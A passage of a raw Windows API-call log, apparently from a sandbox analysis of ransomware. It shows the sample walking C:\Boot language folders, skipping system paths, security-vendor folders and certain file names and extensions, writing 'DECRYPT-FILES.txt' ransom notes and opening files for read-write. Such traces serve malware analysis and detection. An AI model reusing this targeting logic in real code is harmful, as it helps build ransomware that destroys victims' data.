ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.659] FindClose (in: hFindFile=0x479838 | out: hFindFile=0x479838) returned 1 [0179.659] CloseHandle (hObject=0xffffffff) returned 0 [0179.659] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0179.659] lstrcmpW (lpString1="tr-TR", lpString2=".") returned 1 [0179.659] lstrcmpW (lpString1="tr-TR", lpString2="..") returned 1 [0179.659] lstrcatW (in: lpString1="tr-TR", lpString2="\\" | out: lpString1="tr-TR\\") returned="tr-TR\\" [0179.659] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="tr-TR\\" | out: lpString1="C:\\Boot\\tr-TR\\") returned="C:\\Boot\\tr-TR\\" [0179.659] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="\\Program Files") returned 0x0 [0179.659] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch=":\\Windows") returned 0x0 [0179.659] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="\\Games\\") returned 0x0 [0179.659] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.659] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.659] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.659] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.659] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.659] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="\\All Users") returned 0x0 [0179.659] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.659] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.659] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.659] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="AhnLab") returned 0x0 [0179.659] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.659] lstrlenW (lpString="C:\\Boot\\tr-TR\\") returned 14 [0179.659] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.659] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\tr-TR\\\\0a16c9.tmp") returned 25 [0179.659] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\\\0a16c9.tmp" (normalized: "c:\\boot\\tr-tr\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.660] GetLastError () returned 0x5 [0179.660] lstrlenW (lpString="C:\\Boot\\tr-TR\\") returned 14 [0179.660] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.660] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\tr-TR\\\\DECRYPT-FILES.txt") returned 32 [0179.660] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\tr-tr\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.660] lstrlenW (lpString="C:\\Boot\\tr-TR\\") returned 14 [0179.660] lstrcatW (in: lpString1="C:\\Boot\\tr-TR\\", lpString2="*" | out: lpString1="C:\\Boot\\tr-TR\\*") returned="C:\\Boot\\tr-TR\\*" [0179.660] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479838 [0179.660] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.660] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.660] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.660] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.660] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.660] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0179.660] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0179.660] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0179.660] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0179.660] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0179.660] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0179.660] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0179.660] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0179.660] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0179.660] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0179.660] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.661] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0179.661] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0179.661] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0179.661] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0179.661] lstrlenW (lpString="C:\\Boot\\tr-TR\\") returned 14 [0179.661] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.661] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\tr-TR\\" | out: lpString1="C:\\Boot\\tr-TR\\") returned="C:\\Boot\\tr-TR\\" [0179.661] lstrcatW (in: lpString1="C:\\Boot\\tr-TR\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned="C:\\Boot\\tr-TR\\bootmgr.exe.mui" [0179.661] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.661] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.661] CloseHandle (hObject=0x0) returned 0 [0179.661] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.661] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bf5e60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.661] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.661] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bf5e60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.661] FindClose (in: hFindFile=0x479838 | out: hFindFile=0x479838) returned 1 [0179.661] CloseHandle (hObject=0xffffffff) returned 0 [0179.662] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0179.662] lstrcmpW (lpString1="zh-CN", lpString2=".") returned 1 [0179.662] lstrcmpW (lpString1="zh-CN", lpString2="..") returned 1 [0179.662] lstrcatW (in: lpString1="zh-CN", lpString2="\\" | out: lpString1="zh-CN\\") returned="zh-CN\\" [0179.662] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="zh-CN\\" | out: lpString1="C:\\Boot\\zh-CN\\") returned="C:\\Boot\\zh-CN\\" [0179.662] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="\\Program Files") returned 0x0 [0179.662] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch=":\\Windows") returned 0x0 [0179.662] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="\\Games\\") returned 0x0 [0179.662] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.662] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.662] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.662] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.662] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.662] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="\\All Users") returned 0x0 [0179.662] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.662] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.662] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.662] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="AhnLab") returned 0x0 [0179.662] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.662] lstrlenW (lpString="C:\\Boot\\zh-CN\\") returned 14 [0179.662] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.662] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\zh-CN\\\\0a16c9.tmp") returned 25 [0179.662] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\\\0a16c9.tmp" (normalized: "c:\\boot\\zh-cn\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.662] GetLastError () returned 0x5 [0179.662] lstrlenW (lpString="C:\\Boot\\zh-CN\\") returned 14 [0179.662] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.662] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\zh-CN\\\\DECRYPT-FILES.txt") returned 32 [0179.662] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\zh-cn\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.663] lstrlenW (lpString="C:\\Boot\\zh-CN\\") returned 14 [0179.663] lstrcatW (in: lpString1="C:\\Boot\\zh-CN\\", lpString2="*" | out: lpString1="C:\\Boot\\zh-CN\\*") returned="C:\\Boot\\zh-CN\\*" [0179.663] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479838 [0179.664] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.664] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.664] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.664] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.664] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.664] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0179.664] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0179.664] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0179.664] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0179.664] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0179.664] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0179.664] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0179.664] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0179.664] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0179.664] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0179.664] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.664] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0179.664] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0179.664] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0179.664] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0179.664] lstrlenW (lpString="C:\\Boot\\zh-CN\\") returned 14 [0179.664] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.664] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\zh-CN\\" | out: lpString1="C:\\Boot\\zh-CN\\") returned="C:\\Boot\\zh-CN\\" [0179.665] lstrcatW (in: lpString1="C:\\Boot\\zh-CN\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned="C:\\Boot\\zh-CN\\bootmgr.exe.mui" [0179.665] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.665] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.666] CloseHandle (hObject=0x0) returned 0 [0179.666] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.666] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bf5e60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.666] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.666] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bf5e60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.666] FindClose (in: hFindFile=0x479838 | out: hFindFile=0x479838) returned 1 [0179.666] CloseHandle (hObject=0xffffffff) returned 0 [0179.666] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6c1bfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0179.666] lstrcmpW (lpString1="zh-HK", lpString2=".") returned 1 [0179.666] lstrcmpW (lpString1="zh-HK", lpString2="..") returned 1 [0179.666] lstrcatW (in: lpString1="zh-HK", lpString2="\\" | out: lpString1="zh-HK\\") returned="zh-HK\\" [0179.666] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="zh-HK\\" | out: lpString1="C:\\Boot\\zh-HK\\") returned="C:\\Boot\\zh-HK\\" [0179.666] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="\\Program Files") returned 0x0 [0179.666] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch=":\\Windows") returned 0x0 [0179.666] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="\\Games\\") returned 0x0 [0179.667] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.667] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.667] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.667] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.667] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.667] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="\\All Users") returned 0x0 [0179.667] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.667] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.667] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.667] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="AhnLab") returned 0x0 [0179.667] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.667] lstrlenW (lpString="C:\\Boot\\zh-HK\\") returned 14 [0179.667] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.667] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\zh-HK\\\\0a16c9.tmp") returned 25 [0179.667] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\\\0a16c9.tmp" (normalized: "c:\\boot\\zh-hk\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.667] GetLastError () returned 0x5 [0179.667] lstrlenW (lpString="C:\\Boot\\zh-HK\\") returned 14 [0179.667] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.667] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\zh-HK\\\\DECRYPT-FILES.txt") returned 32 [0179.667] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\zh-hk\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.668] lstrlenW (lpString="C:\\Boot\\zh-HK\\") returned 14 [0179.668] lstrcatW (in: lpString1="C:\\Boot\\zh-HK\\", lpString2="*" | out: lpString1="C:\\Boot\\zh-HK\\*") returned="C:\\Boot\\zh-HK\\*" [0179.668] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6c1bfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479838 [0179.668] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.669] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6c1bfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.669] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.669] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.669] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.669] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0179.669] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0179.669] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0179.669] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0179.669] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0179.669] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0179.669] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0179.669] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0179.669] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0179.669] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0179.669] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.669] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0179.669] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0179.669] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0179.669] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0179.669] lstrlenW (lpString="C:\\Boot\\zh-HK\\") returned 14 [0179.669] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.669] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\zh-HK\\" | out: lpString1="C:\\Boot\\zh-HK\\") returned="C:\\Boot\\zh-HK\\" 